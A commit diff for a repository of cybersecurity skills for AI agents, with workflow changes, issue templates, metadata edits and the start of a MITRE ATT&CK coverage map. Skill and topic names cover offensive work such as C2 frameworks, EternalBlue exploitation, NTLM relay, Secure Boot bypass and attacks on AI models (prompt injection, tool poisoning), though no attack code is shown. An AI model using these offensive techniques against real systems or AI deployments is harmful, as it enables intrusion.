chore: auto-update index.json and skill count

Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817)
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and skills categories (ISC2/WEF/CrowdStrike/Mandiant signals): - AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT, prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool invocation, guardrails, model/data poisoning, system-prompt leakage, embedding/vector weaknesses, model extraction, continuous red-teaming - Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion, malicious-npm triage, typosquatting, SLSA/Sigstore provenance - Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit, Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting - Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy, shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse - Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC, Falco, Trivy, kube-bench - Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors - DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso - Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md + scripts/agent.py + LICENSE), with researched real tool commands (no placeholders), complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain table, skill count, and index.json.
2026-06-26 11:44:37 +03:00 · 2026-06-22 17:08:43 +00:00 · 2026-06-22 19:08:16 +02:00 · 2026-06-22 11:17:20 +00:00 · 2026-06-22 13:16:56 +02:00 · 2026-06-20 14:44:31 +00:00
2709 changed files with 322166 additions and 42844 deletions
@@ -2,22 +2,22 @@
  "name": "anthropic-cybersecurity-skills",
  "owner": {
    "name": "mukul975",
-    "email": "mukul975@users.noreply.github.com"
+    "email": "mukuljangra5@gmail.com"
  },
  "metadata": {
-    "description": "607+ cybersecurity skills for AI agents and security practitioners covering web security, pentesting, forensics, threat intelligence, cloud security, and more.",
+    "description": "817 cybersecurity skills for AI agents mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework (F3).",
-    "version": "1.0.0"
+    "version": "1.2.0"
  },
  "plugins": [
    {
      "name": "cybersecurity-skills",
      "source": "./",
-      "description": "607+ cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
+      "description": "817 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more. Mapped to 6 frameworks.",
-      "version": "1.0.0",
+      "version": "1.2.0",
      "author": {
        "name": "mukul975"
      },
-      "license": "MIT",
+      "license": "Apache-2.0",
      "keywords": [
        "cybersecurity",
        "pentesting",
@@ -34,4 +34,4 @@
      "repository": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
    }
  ]
-}
+}
@@ -1,5 +1,5 @@
 {
  "name": "cybersecurity-skills",
-  "description": "607+ cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
+  "description": "817 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
-  "version": "1.0.0"
+  "version": "1.2.0"
 }
@@ -0,0 +1,2 @@
 github: mukul975
 custom: ["https://paypal.me/mahipaljangra"]
@@ -0,0 +1,19 @@
 ---
 name: Improve existing skill
 about: Suggest improvements to an existing skill
 title: '[IMPROVE] skill-name-here'
 labels: 'enhancement'
 assignees: ''
 ---
 ## Skill to improve
 <!-- Folder name of the skill -->
 ## What needs improvement?
 - [ ] agent.py has errors or placeholders
 - [ ] api-reference.md is incomplete
 - [ ] SKILL.md frontmatter is missing fields
 - [ ] ATT&CK mapping is incorrect
 - [ ] Other:
 ## Suggested improvement
@@ -0,0 +1,25 @@
 ---
 name: Add new skill
 about: Propose a new cybersecurity skill for the database
 title: '[NEW SKILL] skill-name-here'
 labels: 'new-skill, good first issue'
 assignees: ''
 ---
 ## Skill name (kebab-case)
 <!-- e.g., detecting-lateral-movement-in-azure -->
 ## Domain / Subdomain
 <!-- e.g., cybersecurity / threat-hunting -->
 ## Description
 <!-- One sentence describing what this skill does -->
 ## MITRE ATT&CK techniques
 <!-- e.g., T1021.001, T1078.004 -->
 ## NIST CSF function
 <!-- Identify, Protect, Detect, Respond, or Recover -->
 ## Why is this skill needed?
 <!-- What problem does it solve for security practitioners? -->
@@ -0,0 +1,43 @@
 name: Sync Marketplace Version on Release
 on:
  release:
    types: [published]
 jobs:
  sync-version:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
          ref: main
          fetch-depth: 0
      - name: Extract version from tag
        id: version
        run: |
          VERSION=${GITHUB_REF_NAME#v}
          echo "version=$VERSION" >> $GITHUB_OUTPUT
          echo "tag=$GITHUB_REF_NAME" >> $GITHUB_OUTPUT
      - name: Update marketplace.json and plugin.json version
        env:
          VERSION: ${{ steps.version.outputs.version }}
        run: |
          jq --arg v "$VERSION" '.metadata.version = $v | .plugins[].version = $v' .claude-plugin/marketplace.json > tmp.json
          mv tmp.json .claude-plugin/marketplace.json
          jq --arg v "$VERSION" '.version = $v' .claude-plugin/plugin.json > tmp.json
          mv tmp.json .claude-plugin/plugin.json
          echo "Updated marketplace.json and plugin.json to version $VERSION"
      - name: Commit and push
        run: |
          git config user.name "mukul975"
          git config user.email "mukuljangra5@gmail.com"
          git add .claude-plugin/marketplace.json .claude-plugin/plugin.json
          git diff --staged --quiet || git commit -m "chore: bump plugin version to ${{ steps.version.outputs.tag }}"
          git push origin HEAD:main
@@ -5,6 +5,8 @@ on:
    branches: [main]
    paths:
      - 'skills/**'
      - '.github/workflows/update-index.yml'
  workflow_dispatch:
 jobs:
  update-index:
@@ -21,12 +23,9 @@ jobs:
          python3 << 'EOF'
          import os, json, re
          from datetime import datetime, timezone
          from collections import Counter
          skills_dir = "skills"
          skills = []
          subdomain_counts = Counter()
          tag_counter = Counter()
          for skill_name in sorted(os.listdir(skills_dir)):
              skill_md = os.path.join(skills_dir, skill_name, "SKILL.md")
@@ -35,58 +34,79 @@ jobs:
              with open(skill_md, "r", encoding="utf-8") as f:
                  content = f.read()
              fm_match = re.match(r"^---\n(.*?)\n---", content, re.DOTALL)
-              if not fm_match:
+              description = ""
-                  continue
+              if fm_match:
-              fm = fm_match.group(1)
+                  m = re.search(r"^description:\s*(.+)$", fm_match.group(1), re.MULTILINE)
-              def get_field(field, text):
+                  if m:
-                  m = re.search(rf"^{field}:\s*(.+)$", text, re.MULTILINE)
+                      description = m.group(1).strip().strip('"')
                  return m.group(1).strip().strip('"') if m else ""
              def get_tags(text):
                  m = re.search(r"^tags:\s*\[(.+)\]", text, re.MULTILINE)
                  return [t.strip() for t in m.group(1).split(",")] if m else []
              tags = get_tags(fm)
              subdomain = get_field("subdomain", fm)
              subdomain_counts[subdomain] += 1
              for t in tags:
                  tag_counter[t] += 1
              skills.append({
-                  "name": get_field("name", fm),
+                  "name": skill_name,
-                  "description": get_field("description", fm),
+                  "description": description,
                  "domain": "cybersecurity",
                  "subdomain": subdomain,
                  "tags": tags,
                  "version": get_field("version", fm) or "1.0",
                  "author": "mukul975",
                  "license": "Apache-2.0",
                  "path": f"skills/{skill_name}"
              })
          top_tags = sorted(tag_counter.items(), key=lambda x: -x[1])[:20]
          index = {
-              "version": "1.0.0",
+              "version": "1.1.0",
              "generated_at": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
              "repository": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills",
              "domain": "cybersecurity",
              "total_skills": len(skills),
              "total_domains": 1,
              "total_subdomains": len(subdomain_counts),
              "domain_stats": {"cybersecurity": len(skills)},
              "subdomain_stats": dict(subdomain_counts),
              "top_tags": [{"tag": t, "count": c} for t, c in top_tags],
              "skills": skills
          }
          with open("index.json", "w", encoding="utf-8") as f:
-              json.dump(index, f, indent=2)
+              json.dump(index, f, separators=(',', ':'))
-          print(f"Updated index.json: {len(skills)} skills, {len(subdomain_counts)} subdomains")
+          print(f"Updated index.json: {len(skills)} skills")
          EOF
-      - name: Commit updated index
+      - name: Sync skill count into README and marketplace
        run: |
          python3 << 'EOF'
          import os, re, json
          # Authoritative count: directories under skills/ that contain a SKILL.md
          # and are not .bak backups (matches index.json generation above).
          count = 0
          for name in os.listdir("skills"):
              if name.endswith(".bak"):
                  continue
              if os.path.isfile(os.path.join("skills", name, "SKILL.md")):
                  count += 1
          print(f"Authoritative skill count: {count}")
          # README.md — replace the skills badge and every "<NNN> ... skills" phrase.
          with open("README.md", encoding="utf-8") as f:
              readme = f.read()
          readme = re.sub(r"(badge/skills-)\d+", rf"\g<1>{count}", readme)
          # "754 production-grade", "754 structured", "754 skills", "all 754 skills",
          # "Scans 754 skill", "contains **754 skills**", BibTeX "{754 structured"
          readme = re.sub(r"\b\d+(?=\s+production-grade cybersecurity skills)", str(count), readme)
          readme = re.sub(r"\b\d+(?=\s+structured cybersecurity skills)", str(count), readme)
          readme = re.sub(r"(all\s+)\d+(?=\s+skills)", rf"\g<1>{count}", readme)
          readme = re.sub(r"(Scans\s+)\d+(?=\s+skill\b)", rf"\g<1>{count}", readme)
          readme = re.sub(r"(contains\s+\*\*)\d+(?=\s+skills\*\*)", rf"\g<1>{count}", readme)
          readme = re.sub(r"(\{)\d+(?=\s+structured cybersecurity skills)", rf"\g<1>{count}", readme)
          with open("README.md", "w", encoding="utf-8") as f:
              f.write(readme)
          # marketplace.json + plugin.json — patch "<NNN> cybersecurity skills" in descriptions.
          for path in (".claude-plugin/marketplace.json", ".claude-plugin/plugin.json"):
              with open(path, encoding="utf-8") as f:
                  data = f.read()
              data = re.sub(r"\b\d+(?=\s+cybersecurity skills)", str(count), data)
              json.loads(data)  # fail loudly if the regex broke JSON
              with open(path, "w", encoding="utf-8") as f:
                  f.write(data)
          print("Synced skill count into README.md, marketplace.json, plugin.json")
          EOF
      - name: Commit updated index and skill count
        run: |
          git config user.name "mukul975"
-          git config user.email "mukul975@users.noreply.github.com"
+          git config user.email "mukuljangra5@gmail.com"
-          git add index.json
+          git add index.json README.md .claude-plugin/marketplace.json .claude-plugin/plugin.json
-          git diff --staged --quiet || git commit -m "chore: auto-update index.json"
+          git diff --staged --quiet || git commit -m "chore: auto-update index.json and skill count"
          git push
@@ -11,3 +11,6 @@ __pycache__/
 .DS_Store
 Thumbs.db
 *.swp
 launch/
 extract_attack.py
 AUDIT_REPORT.md
@@ -0,0 +1,509 @@
 # MITRE ATT&CK Coverage Map
 <p align="center">
  <a href="https://attack.mitre.org/"><img src="https://img.shields.io/badge/MITRE_ATT%26CK-v16-red?style=for-the-badge&logo=shield&logoColor=white" alt="MITRE ATT&CK" /></a>
  <img src="https://img.shields.io/badge/Techniques-291+-blueviolet?style=for-the-badge" alt="Techniques" />
  <img src="https://img.shields.io/badge/Tactics-14%2F14-green?style=for-the-badge" alt="Tactics" />
 </p>
 This document maps all **291 unique MITRE ATT&CK techniques** (across **149 parent techniques**) referenced in our **753+ cybersecurity skills** to the 14 Enterprise ATT&CK tactics. Use this to identify coverage gaps, plan detection engineering priorities, or validate your security program against the ATT&CK framework.
 > **How to read this:** Each technique links to its official ATT&CK page. Skills listed under each technique are the ones in this repository that teach detection, hunting, exploitation, or response for that technique.
 ---
 ## Coverage Summary
 | Tactic | Techniques | Coverage |
 |:-------|:---------:|:---------|
 | 🔎 **Reconnaissance** | **12** | `████████████░░░░░░░░░░░░░░░░░░` |
 | 🏗️ **Resource Development** | **7** | `███████░░░░░░░░░░░░░░░░░░░░░░░` |
 | 🚪 **Initial Access** | **18** | `██████████████████░░░░░░░░░░░░` |
 | ⚡ **Execution** | **18** | `██████████████████░░░░░░░░░░░░` |
 | 🔩 **Persistence** | **36** | `██████████████████████████████` |
 | ⬆️ **Privilege Escalation** | **11** | `███████████░░░░░░░░░░░░░░░░░░░` |
 | 🥷 **Defense Evasion** | **48** | `██████████████████████████████` |
 | 🔑 **Credential Access** | **27** | `███████████████████████████░░░` |
 | 🗺️ **Discovery** | **20** | `████████████████████░░░░░░░░░░` |
 | ↔️ **Lateral Movement** | **9** | `█████████░░░░░░░░░░░░░░░░░░░░░` |
 | 📦 **Collection** | **13** | `█████████████░░░░░░░░░░░░░░░░░` |
 | 📡 **Command and Control** | **20** | `████████████████████░░░░░░░░░░` |
 | 📤 **Exfiltration** | **12** | `████████████░░░░░░░░░░░░░░░░░░` |
 | 💥 **Impact** | **6** | `██████░░░░░░░░░░░░░░░░░░░░░░░░` |
 | 🔧 **Other/Cross-tactic** | **34** | |
 | | **291** | **Total unique techniques** |
 ---
 ## 🔎 Reconnaissance
 **12 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1589](https://attack.mitre.org/techniques/T1589/) | `conducting-full-scope-red-team-engagement`, `conducting-social-engineering-pretext-call`, `performing-open-source-intelligence-gathering` |
 | [T1590](https://attack.mitre.org/techniques/T1590/) | `performing-open-source-intelligence-gathering` |
 | [T1591](https://attack.mitre.org/techniques/T1591/) | `collecting-open-source-intelligence`, `conducting-social-engineering-pretext-call`, `performing-open-source-intelligence-gathering` |
 | [T1592](https://attack.mitre.org/techniques/T1592/) | `performing-open-source-intelligence-gathering` |
 | [T1593](https://attack.mitre.org/techniques/T1593/) | `conducting-full-scope-red-team-engagement`, `performing-open-source-intelligence-gathering` |
 | [T1594](https://attack.mitre.org/techniques/T1594/) | `performing-open-source-intelligence-gathering` |
 | [T1595](https://attack.mitre.org/techniques/T1595/) | `executing-red-team-engagement-planning`, `triaging-security-incident` |
 | [T1595.001](https://attack.mitre.org/techniques/T1595/001/) | `performing-open-source-intelligence-gathering` |
 | [T1595.002](https://attack.mitre.org/techniques/T1595/002/) | `performing-open-source-intelligence-gathering` |
 | [T1596](https://attack.mitre.org/techniques/T1596/) | `performing-open-source-intelligence-gathering` |
 | [T1598](https://attack.mitre.org/techniques/T1598/) | `conducting-social-engineering-pretext-call` |
 | [T1598.003](https://attack.mitre.org/techniques/T1598/003/) | `conducting-social-engineering-pretext-call`, `conducting-spearphishing-simulation-campaign` |
 ---
 ## 🏗️ Resource Development
 **7 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1583.001](https://attack.mitre.org/techniques/T1583/001/) | `building-red-team-c2-infrastructure-with-havoc`, `conducting-full-scope-red-team-engagement`, `conducting-spearphishing-simulation-campaign`, `implementing-mitre-attack-coverage-mapping` |
 | [T1583.003](https://attack.mitre.org/techniques/T1583/003/) | `building-red-team-c2-infrastructure-with-havoc` |
 | [T1584.001](https://attack.mitre.org/techniques/T1584/001/) | `hunting-for-dns-based-persistence` |
 | [T1585.002](https://attack.mitre.org/techniques/T1585/002/) | `conducting-spearphishing-simulation-campaign` |
 | [T1587.001](https://attack.mitre.org/techniques/T1587/001/) | `building-red-team-c2-infrastructure-with-havoc`, `conducting-full-scope-red-team-engagement` |
 | [T1608.001](https://attack.mitre.org/techniques/T1608/001/) | `conducting-spearphishing-simulation-campaign` |
 | [T1608.005](https://attack.mitre.org/techniques/T1608/005/) | `conducting-spearphishing-simulation-campaign` |
 ---
 ## 🚪 Initial Access
 **18 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1078](https://attack.mitre.org/techniques/T1078/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-powershell-script-block-logging`, `analyzing-windows-event-logs-in-splunk`, `building-threat-hunt-hypothesis-framework`, `conducting-full-scope-red-team-engagement` +13 more |
 | [T1078.001](https://attack.mitre.org/techniques/T1078/001/) | `detecting-service-account-abuse` |
 | [T1078.002](https://attack.mitre.org/techniques/T1078/002/) | `conducting-domain-persistence-with-dcsync`, `detecting-service-account-abuse`, `exploiting-active-directory-certificate-services-esc1`, `exploiting-constrained-delegation-abuse`, `exploiting-nopac-cve-2021-42278-42287` +1 more |
 | [T1078.003](https://attack.mitre.org/techniques/T1078/003/) | `performing-privilege-escalation-assessment` |
 | [T1078.004](https://attack.mitre.org/techniques/T1078/004/) | `detecting-azure-lateral-movement`, `detecting-azure-service-principal-abuse`, `implementing-mitre-attack-coverage-mapping`, `implementing-threat-modeling-with-mitre-attack` |
 | [T1091](https://attack.mitre.org/techniques/T1091/) | `executing-red-team-engagement-planning`, `performing-physical-intrusion-assessment` |
 | [T1133](https://attack.mitre.org/techniques/T1133/) | `executing-red-team-engagement-planning`, `performing-threat-landscape-assessment-for-sector` |
 | [T1190](https://attack.mitre.org/techniques/T1190/) | `conducting-full-scope-red-team-engagement`, `executing-red-team-engagement-planning`, `exploiting-ms17-010-eternalblue-vulnerability`, `hunting-for-webshell-activity`, `performing-threat-landscape-assessment-for-sector` +1 more |
 | [T1195](https://attack.mitre.org/techniques/T1195/) | `analyzing-supply-chain-malware-artifacts`, `performing-threat-landscape-assessment-for-sector` |
 | [T1195.001](https://attack.mitre.org/techniques/T1195/001/) | `hunting-for-supply-chain-compromise` |
 | [T1195.002](https://attack.mitre.org/techniques/T1195/002/) | `hunting-for-supply-chain-compromise` |
 | [T1199](https://attack.mitre.org/techniques/T1199/) | `hunting-for-supply-chain-compromise`, `performing-physical-intrusion-assessment` |
 | [T1200](https://attack.mitre.org/techniques/T1200/) | `executing-red-team-engagement-planning`, `performing-physical-intrusion-assessment` |
 | [T1566](https://attack.mitre.org/techniques/T1566/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-threat-actor-ttps-with-mitre-attack`, `analyzing-threat-landscape-with-misp`, `building-attack-pattern-library-from-cti-reports`, `hunting-advanced-persistent-threats` +3 more |
 | [T1566.001](https://attack.mitre.org/techniques/T1566/001/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-campaign-attribution-evidence`, `analyzing-macro-malware-in-office-documents`, `analyzing-threat-actor-ttps-with-mitre-navigator`, `building-attack-pattern-library-from-cti-reports` +13 more |
 | [T1566.002](https://attack.mitre.org/techniques/T1566/002/) | `building-attack-pattern-library-from-cti-reports`, `conducting-spearphishing-simulation-campaign`, `hunting-for-spearphishing-indicators`, `implementing-continuous-security-validation-with-bas`, `implementing-mitre-attack-coverage-mapping` +1 more |
 | [T1566.003](https://attack.mitre.org/techniques/T1566/003/) | `conducting-spearphishing-simulation-campaign`, `hunting-for-spearphishing-indicators`, `implementing-continuous-security-validation-with-bas` |
 | [T1566.004](https://attack.mitre.org/techniques/T1566/004/) | `conducting-social-engineering-pretext-call` |
 ---
 ## ⚡ Execution
 **18 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1047](https://attack.mitre.org/techniques/T1047/) | `conducting-full-scope-red-team-engagement`, `detecting-fileless-attacks-on-endpoints`, `detecting-lateral-movement-with-splunk`, `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas` +8 more |
 | [T1053](https://attack.mitre.org/techniques/T1053/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-persistence-mechanisms-in-linux`, `hunting-advanced-persistent-threats`, `hunting-for-persistence-mechanisms-in-windows`, `implementing-mitre-attack-coverage-mapping` +4 more |
 | [T1053.002](https://attack.mitre.org/techniques/T1053/002/) | `hunting-for-scheduled-task-persistence` |
 | [T1053.003](https://attack.mitre.org/techniques/T1053/003/) | `analyzing-persistence-mechanisms-in-linux`, `hunting-for-scheduled-task-persistence`, `performing-privilege-escalation-assessment`, `performing-privilege-escalation-on-linux` |
 | [T1053.005](https://attack.mitre.org/techniques/T1053/005/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-campaign-attribution-evidence`, `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `building-detection-rule-with-splunk-spl` +17 more |
 | [T1059](https://attack.mitre.org/techniques/T1059/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-threat-actor-ttps-with-mitre-attack`, `analyzing-windows-event-logs-in-splunk`, `building-incident-timeline-with-timesketch`, `deobfuscating-powershell-obfuscated-malware` +7 more |
 | [T1059.001](https://attack.mitre.org/techniques/T1059/001/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-campaign-attribution-evidence`, `analyzing-macro-malware-in-office-documents`, `analyzing-powershell-empire-artifacts`, `analyzing-powershell-script-block-logging` +29 more |
 | [T1059.003](https://attack.mitre.org/techniques/T1059/003/) | `building-attack-pattern-library-from-cti-reports`, `building-detection-rule-with-splunk-spl`, `detecting-suspicious-powershell-execution`, `mapping-mitre-attack-techniques`, `performing-purple-team-atomic-testing` |
 | [T1059.004](https://attack.mitre.org/techniques/T1059/004/) | `performing-purple-team-atomic-testing` |
 | [T1059.005](https://attack.mitre.org/techniques/T1059/005/) | `analyzing-macro-malware-in-office-documents`, `detecting-living-off-the-land-attacks`, `executing-red-team-exercise`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs` +2 more |
 | [T1059.006](https://attack.mitre.org/techniques/T1059/006/) | `performing-purple-team-atomic-testing` |
 | [T1059.007](https://attack.mitre.org/techniques/T1059/007/) | `performing-purple-team-atomic-testing` |
 | [T1129](https://attack.mitre.org/techniques/T1129/) | `performing-purple-team-atomic-testing` |
 | [T1203](https://attack.mitre.org/techniques/T1203/) | `performing-purple-team-atomic-testing` |
 | [T1204.001](https://attack.mitre.org/techniques/T1204/001/) | `conducting-spearphishing-simulation-campaign` |
 | [T1204.002](https://attack.mitre.org/techniques/T1204/002/) | `analyzing-macro-malware-in-office-documents`, `conducting-full-scope-red-team-engagement`, `conducting-spearphishing-simulation-campaign`, `detecting-living-off-the-land-attacks`, `executing-red-team-engagement-planning` +4 more |
 | [T1569](https://attack.mitre.org/techniques/T1569/) | `performing-purple-team-atomic-testing` |
 | [T1569.002](https://attack.mitre.org/techniques/T1569/002/) | `detecting-lateral-movement-in-network`, `detecting-lateral-movement-with-splunk`, `exploiting-ms17-010-eternalblue-vulnerability`, `performing-purple-team-atomic-testing` |
 ---
 ## 🔩 Persistence
 **36 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1098](https://attack.mitre.org/techniques/T1098/) | `analyzing-windows-event-logs-in-splunk`, `conducting-domain-persistence-with-dcsync`, `hunting-for-t1098-account-manipulation`, `implementing-mitre-attack-coverage-mapping`, `implementing-siem-use-cases-for-detection` +1 more |
 | [T1098.001](https://attack.mitre.org/techniques/T1098/001/) | `conducting-cloud-penetration-testing`, `detecting-azure-lateral-movement`, `detecting-azure-service-principal-abuse`, `hunting-for-t1098-account-manipulation`, `implementing-mitre-attack-coverage-mapping` |
 | [T1098.002](https://attack.mitre.org/techniques/T1098/002/) | `detecting-azure-lateral-movement`, `detecting-email-forwarding-rules-attack` |
 | [T1098.004](https://attack.mitre.org/techniques/T1098/004/) | `analyzing-persistence-mechanisms-in-linux`, `implementing-security-monitoring-with-datadog` |
 | [T1136](https://attack.mitre.org/techniques/T1136/) | `detecting-privilege-escalation-in-kubernetes-pods`, `implementing-mitre-attack-coverage-mapping`, `performing-purple-team-atomic-testing` |
 | [T1136.001](https://attack.mitre.org/techniques/T1136/001/) | `analyzing-windows-event-logs-in-splunk`, `performing-purple-team-atomic-testing` |
 | [T1136.002](https://attack.mitre.org/techniques/T1136/002/) | `exploiting-nopac-cve-2021-42278-42287` |
 | [T1197](https://attack.mitre.org/techniques/T1197/) | `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs`, `performing-purple-team-atomic-testing` |
 | [T1505](https://attack.mitre.org/techniques/T1505/) | `performing-purple-team-atomic-testing` |
 | [T1505.003](https://attack.mitre.org/techniques/T1505/003/) | `building-attack-pattern-library-from-cti-reports`, `hunting-for-webshell-activity`, `performing-purple-team-atomic-testing` |
 | [T1542.001](https://attack.mitre.org/techniques/T1542/001/) | `analyzing-uefi-bootkit-persistence` |
 | [T1542.003](https://attack.mitre.org/techniques/T1542/003/) | `analyzing-uefi-bootkit-persistence` |
 | [T1543](https://attack.mitre.org/techniques/T1543/) | `analyzing-persistence-mechanisms-in-linux`, `hunting-for-persistence-mechanisms-in-windows`, `performing-purple-team-atomic-testing` |
 | [T1543.002](https://attack.mitre.org/techniques/T1543/002/) | `analyzing-persistence-mechanisms-in-linux`, `performing-privilege-escalation-on-linux` |
 | [T1543.003](https://attack.mitre.org/techniques/T1543/003/) | `detecting-lateral-movement-with-splunk`, `detecting-living-off-the-land-attacks`, `detecting-privilege-escalation-attempts`, `hunting-for-persistence-mechanisms-in-windows`, `hunting-for-unusual-service-installations` +2 more |
 | [T1546](https://attack.mitre.org/techniques/T1546/) | `analyzing-persistence-mechanisms-in-linux`, `performing-purple-team-atomic-testing` |
 | [T1546.001](https://attack.mitre.org/techniques/T1546/001/) | `performing-purple-team-atomic-testing` |
 | [T1546.003](https://attack.mitre.org/techniques/T1546/003/) | `analyzing-windows-event-logs-in-splunk`, `detecting-fileless-attacks-on-endpoints`, `detecting-fileless-malware-techniques`, `detecting-wmi-persistence`, `hunting-for-lateral-movement-via-wmi` +3 more |
 | [T1546.004](https://attack.mitre.org/techniques/T1546/004/) | `analyzing-persistence-mechanisms-in-linux` |
 | [T1546.010](https://attack.mitre.org/techniques/T1546/010/) | `hunting-for-persistence-mechanisms-in-windows` |
 | [T1546.012](https://attack.mitre.org/techniques/T1546/012/) | `hunting-for-persistence-mechanisms-in-windows`, `hunting-for-registry-persistence-mechanisms` |
 | [T1546.015](https://attack.mitre.org/techniques/T1546/015/) | `hunting-for-persistence-mechanisms-in-windows`, `hunting-for-registry-persistence-mechanisms` |
 | [T1547](https://attack.mitre.org/techniques/T1547/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-malware-persistence-with-autoruns`, `hunting-advanced-persistent-threats`, `hunting-for-persistence-mechanisms-in-windows`, `implementing-siem-use-cases-for-detection` +3 more |
 | [T1547.001](https://attack.mitre.org/techniques/T1547/001/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `conducting-full-scope-red-team-engagement`, `detecting-fileless-attacks-on-endpoints` +10 more |
 | [T1547.004](https://attack.mitre.org/techniques/T1547/004/) | `hunting-for-persistence-mechanisms-in-windows`, `hunting-for-registry-persistence-mechanisms`, `performing-purple-team-atomic-testing` |
 | [T1547.005](https://attack.mitre.org/techniques/T1547/005/) | `hunting-for-persistence-mechanisms-in-windows` |
 | [T1547.009](https://attack.mitre.org/techniques/T1547/009/) | `performing-purple-team-atomic-testing` |
 | [T1556](https://attack.mitre.org/techniques/T1556/) | `performing-initial-access-with-evilginx3` |
 | [T1556.007](https://attack.mitre.org/techniques/T1556/007/) | `detecting-azure-lateral-movement` |
 | [T1574](https://attack.mitre.org/techniques/T1574/) | `analyzing-persistence-mechanisms-in-linux`, `performing-purple-team-atomic-testing` |
 | [T1574.001](https://attack.mitre.org/techniques/T1574/001/) | `detecting-dll-sideloading-attacks`, `hunting-for-persistence-mechanisms-in-windows`, `performing-purple-team-atomic-testing` |
 | [T1574.002](https://attack.mitre.org/techniques/T1574/002/) | `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `detecting-dll-sideloading-attacks`, `implementing-siem-use-cases-for-detection`, `performing-purple-team-atomic-testing` |
 | [T1574.006](https://attack.mitre.org/techniques/T1574/006/) | `analyzing-persistence-mechanisms-in-linux`, `detecting-dll-sideloading-attacks`, `performing-privilege-escalation-on-linux` |
 | [T1574.008](https://attack.mitre.org/techniques/T1574/008/) | `detecting-dll-sideloading-attacks` |
 | [T1574.009](https://attack.mitre.org/techniques/T1574/009/) | `detecting-privilege-escalation-attempts` |
 | [T1574.011](https://attack.mitre.org/techniques/T1574/011/) | `detecting-privilege-escalation-attempts` |
 ---
 ## ⬆️ Privilege Escalation
 **11 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1068](https://attack.mitre.org/techniques/T1068/) | `conducting-full-scope-red-team-engagement`, `detecting-container-escape-attempts`, `detecting-privilege-escalation-attempts`, `detecting-privilege-escalation-in-kubernetes-pods`, `executing-red-team-engagement-planning` +5 more |
 | [T1134](https://attack.mitre.org/techniques/T1134/) | `analyzing-windows-event-logs-in-splunk`, `detecting-privilege-escalation-attempts` |
 | [T1134.001](https://attack.mitre.org/techniques/T1134/001/) | `detecting-privilege-escalation-attempts`, `exploiting-constrained-delegation-abuse`, `performing-purple-team-atomic-testing` |
 | [T1134.005](https://attack.mitre.org/techniques/T1134/005/) | `hunting-for-t1098-account-manipulation`, `performing-active-directory-compromise-investigation` |
 | [T1484](https://attack.mitre.org/techniques/T1484/) | `exploiting-active-directory-certificate-services-esc1`, `performing-active-directory-vulnerability-assessment` |
 | [T1484.001](https://attack.mitre.org/techniques/T1484/001/) | `deploying-active-directory-honeytokens`, `performing-active-directory-compromise-investigation` |
 | [T1548](https://attack.mitre.org/techniques/T1548/) | `detecting-container-escape-attempts`, `detecting-privilege-escalation-in-kubernetes-pods`, `detecting-t1548-abuse-elevation-control-mechanism`, `performing-privilege-escalation-assessment` |
 | [T1548.001](https://attack.mitre.org/techniques/T1548/001/) | `detecting-privilege-escalation-attempts`, `detecting-privilege-escalation-in-kubernetes-pods`, `detecting-t1548-abuse-elevation-control-mechanism`, `performing-privilege-escalation-assessment`, `performing-privilege-escalation-on-linux` |
 | [T1548.002](https://attack.mitre.org/techniques/T1548/002/) | `conducting-full-scope-red-team-engagement`, `detecting-privilege-escalation-attempts`, `detecting-t1548-abuse-elevation-control-mechanism`, `performing-purple-team-atomic-testing` |
